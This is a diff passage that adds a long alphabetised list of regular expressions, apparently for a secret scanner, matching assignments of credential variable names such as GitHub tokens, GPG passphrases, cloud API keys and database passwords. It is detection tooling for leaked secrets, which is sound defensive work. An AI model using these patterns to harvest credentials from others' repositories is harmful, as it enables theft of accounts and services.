+ - "(?i)[\"']?kovan[_-]?private[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?keystore[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?kafka[_-]?rest[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?kafka[_-]?instance[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?kafka[_-]?admin[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?jwt[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?jdbc:mysql[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?jdbc[_-]?host[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?jdbc[_-]?databaseurl[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?itest[_-]?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ios[_-]?docs[_-]?deploy[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?internal[_-]?secrets[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?integration[_-]?test[_-]?appid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?integration[_-]?test[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?index[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ij[_-]?repo[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ij[_-]?repo[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?hub[_-]?dxia2[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?homebrew[_-]?github[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?hockeyapp[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?heroku[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?heroku[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?heroku[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?hb[_-]?codesign[_-]?key[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?hb[_-]?codesign[_-]?gpg[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?hab[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?hab[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?grgit[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?gren[_-]?github[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?gradle[_-]?signing[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?gradle[_-]?signing[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?gradle[_-]?publish[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?gradle[_-]?publish[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?gpg[_-]?secret[_-]?keys[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?gpg[_-]?private[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?gpg[_-]?passphrase[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?gpg[_-]?ownertrust[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?gpg[_-]?keyname[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?gpg[_-]?key[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?google[_-]?private[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?google[_-]?maps[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?google[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?google[_-]?client[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?google[_-]?client[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?google[_-]?account[_-]?type[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?gogs[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?gitlab[_-]?user[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?github[_-]?tokens[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?github[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?github[_-]?repo[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?github[_-]?release[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?github[_-]?pwd[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?github[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?github[_-]?oauth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?github[_-]?oauth[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?github[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?github[_-]?hunter[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?github[_-]?hunter[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?github[_-]?deployment[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?github[_-]?deploy[_-]?hb[_-]?doc[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?github[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?github[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?github[_-]?auth[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?github[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?github[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?github[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?git[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?git[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?git[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?git[_-]?committer[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?git[_-]?committer[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?git[_-]?author[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?git[_-]?author[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ghost[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ghb[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?gh[_-]?unstable[_-]?oauth[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?gh[_-]?repo[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?gh[_-]?oauth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?gh[_-]?oauth[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?gh[_-]?next[_-]?oauth[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?gh[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?gh[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?gcs[_-]?bucket[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?gcr[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?gcloud[_-]?service[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?gcloud[_-]?project[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?gcloud[_-]?bucket[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ftp[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ftp[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ftp[_-]?pw[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ftp[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ftp[_-]?login[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ftp[_-]?host[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?fossa[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?flickr[_-]?api[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?flickr[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?flask[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?firefox[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?firebase[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?firebase[_-]?project[_-]?develop[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?firebase[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?firebase[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?firebase[_-]?api[_-]?json[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?file[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?exp[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?eureka[_-]?awssecretkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?env[_-]?sonatype[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?env[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?env[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?env[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?env[_-]?heroku[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?env[_-]?github[_-]?oauth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?end[_-]?user[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?encryption[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?elasticsearch[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?elastic[_-]?cloud[_-]?auth[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?dsonar[_-]?projectkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?dsonar[_-]?login[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?droplet[_-]?travis[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?dropbox[_-]?oauth[_-]?bearer[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?doordash[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?dockerhubpassword[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?dockerhub[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?docker[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?docker[_-]?postgres[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?docker[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?docker[_-]?passwd[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?docker[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?docker[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?docker[_-]?hub[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?digitalocean[_-]?ssh[_-]?key[_-]?ids[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?digitalocean[_-]?ssh[_-]?key[_-]?body[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?digitalocean[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?dgpg[_-]?passphrase[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?deploy[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?deploy[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?deploy[_-]?secure[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?deploy[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ddgc[_-]?github[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ddg[_-]?test[_-]?email[_-]?pw[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ddg[_-]?test[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?db[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?db[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?db[_-]?pw[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?db[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?db[_-]?host[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?db[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?db[_-]?connection[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?datadog[_-]?app[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?datadog[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?database[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?database[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?database[_-]?port[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?database[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?database[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?database[_-]?host[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?danger[_-]?github[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?cypress[_-]?record[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?coverity[_-]?scan[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?coveralls[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?coveralls[_-]?repo[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?coveralls[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?cos[_-]?secrets[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?conversation[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?conversation[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?contentful[_-]?v2[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?contentful[_-]?test[_-]?org[_-]?cma[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?contentful[_-]?php[_-]?management[_-]?test[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?contentful[_-]?management[_-]?api[_-]?access[_-]?token[_-]?new[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?contentful[_-]?management[_-]?api[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?contentful[_-]?integration[_-]?management[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?contentful[_-]?cma[_-]?test[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?contentful[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?consumerkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?consumer[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?conekta[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?coding[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?codecov[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?codeclimate[_-]?repo[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?codacy[_-]?project[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?cocoapods[_-]?trunk[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?cocoapods[_-]?trunk[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?cn[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?cn[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?clu[_-]?ssh[_-]?private[_-]?key[_-]?base64[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?clu[_-]?repo[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?cloudinary[_-]?url[_-]?staging[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?cloudinary[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?cloudflare[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?cloudflare[_-]?auth[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?cloudflare[_-]?auth[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?cloudflare[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?cloudant[_-]?service[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?cloudant[_-]?processed[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
